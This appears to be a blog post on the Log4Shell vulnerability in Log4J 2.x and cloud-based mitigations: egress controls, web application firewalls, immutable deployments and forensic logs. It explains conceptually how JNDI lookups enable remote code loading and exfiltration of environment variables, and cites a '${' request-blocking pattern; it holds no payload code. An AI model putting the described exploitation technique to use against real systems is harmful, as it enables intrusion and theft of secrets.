Using Cloud Deployments To Mitigate Log4Shell and Similar Vulnerabilities

It’s been a little over a week since disclosure of CVE-2021-44228, aka Log4Shell, a remote code execution vulnerability in Log4J 2.x. Hopefully by now everybody reading this has updated their Java deployments with the latest Log4J libraries. But no doubt there’s another vulnerability, in some popular framework or library, just waiting to make its presence known. This post is about Cloud features that can help you minimize the blast radius of such vulnerabilities.

The problem

For those who haven’t looked into CVE-2021-44228 (perhaps you don’t use Java, or don’t use Log4J 2.x), here are the conditions that made it happen:

Log4J 2.x provides a feature known as “lookups,” which allow you to retrieve data from outside the program — often environment variables, but there are many sources. Lookups are typically used to configure the logging framework for a particular application instance. What most developers didn’t know is that this it’s also used by one of the components that formats log messages.
This means that logging unsanitized user-supplied data could have unintended consequences if that data included (intentionally or accidentally) the “escape sequence” that identifies a lookup. This would be annoying but not devastating, except …
One of the external sources is the Java Naming and Directory Interface (JNDI), which provides a common wrapper on a centralized directory service. For configuration, this makes a lot of sense: it allows companies to manage their application configuration in their existing LDAP servers. Invoked for arbitrary log messages, it provides a way to exfiltrate information about your application. And unknown to most Java developers, the JNDI specification also allows retrieval and instantiation of Java objects with code loaded from the remote server, creating a remote-code-execution vulnerability.

Combine these three, and you have a situation where specially crafted log message could load and execute code from an attacker-controlled server. Public-facing web applications were the most vulnerable targets; web-apps in general are likely to log unsanitized user input (in access logs, if nowhere else).

So how can a Cloud deployment mitigate this?

First, by controlling access to the Internet.

Log4Shell only “works” if it can connect to an attacker-controlled server. But Cloud providers give you many ways to control an application’s access to the Internet. I’m most familiar with AWS, which provides private subnets that don’t allow any Internet connectivity, security groups, which can limit outbound TCP or UDP connections to specific IP address ranges and ports, and network ACLs, which can provided similar access restrictions for everything in a subnet.

Unfortunately, these tools are not used nearly as much as they should be. Security groups, in particular, are primarily used to control inbound traffic, and allow unrestricted outbound traffic. One reason for this open access is that many applications do connect to external servers. Logging is a prime example: whether you use a third-party log aggregator or a services such as CloudWatch Logs, your application needs to connect to the Internet.

But it is possible to limit outbound access even with these restrictions. AWS, for example, provides “VPC endpoints,” which allow you to connect to services using an in-VPC address. And most third-party providers will use static IP addresses that can be identified in your access rules.

Second, by providing services that intercept requests before they hit your application.

As I said above, web applications are the most likely targets for this exploit, because they exist to accept requests from the Internet. But they can be protected: most Cloud vendors offer a web application firewall (WAF), which inspects incoming requests and rejects those that violate predefined rules. In addition to user-defined rules, vendors provide rulesets that can easily be added to a current WAF configuration.

I want to call out CloudFlare on this front: in addition to creating rules for their WAF, they also published an explanation of the vulnerability, a detailed description of how they responded to it (which is a great base for an end-user incident playbook!), and their observations of attempted attacks.

One of my biggest take-aways from those blog posts are the techniques that attackers used to hide their actions. While this particular vulnerability can be mitigated by rejecting any requests that contain the sequence ${, other vulnerabilities may be harder to detect. And it underscores that Cloud providers can throw more resources at identifying and mitigating attacks than the typical application development team.

Third, by encouraging immutable deployments.

Let’s say that your application was vulnerable, but you were able to quickly rebuild with a fixed version of Log4J. Now you need to deploy that changed application. In a traditional data center, you’ll deploy onto existing servers. Servers that, if you’re unlucky, now harbor malware.

In the Cloud, however, a standard deployment practice is to start new servers and then shut down the old. While it’s possible for a targeted attack to create malware that survives this process, a mass exploitation like we saw last week is by its nature untargeted.

Fourth, by providing infrastructure logs that allows you to diagnose follow-on attacks.

One of the chief concerns of this vulnerability is not that your systems are running malware, but that the attackers were able to exfiltrate sensitive information.

Many applications use environment variables to provide information such as database passwords and connection strings. As shown in the CloudFlare posts, it’s easy to make a request to an external server in which the request URL embeds the values of commonly-used environment variables.

You may or may not have forensic logging enabled in your data center, but it’s easy and (relatively) cheap to do so with Cloud providers. AWS, for example, provides Flow Logs to track network communications (so you can see if your app-servers are talking to an unexpected remote host), and CloudTrail to track AWS API calls (so you can see who made changes to your infrastructure, when, and from where). Combine these with access logs generated at multiple levels of the web stack, and you can determine whether an attack was attempted, whether it was successful, and whether there were any post-attack repercussions.

Moving forward

Perhaps you’ve updated and redeployed all of your applications. Perhaps you didn’t have anything that used Log4J 2.x. Or Java. Is it worth taking any of the steps that I’ve described in this post?

The simple answer is yes, because this won’t be the last vulnerability that allows unintended access to external servers. Software is complex; any non-trivial deployment has components whose interactions aren’t fully understood. But sooner or later, someone will find an interaction that has similar far-reaching effects.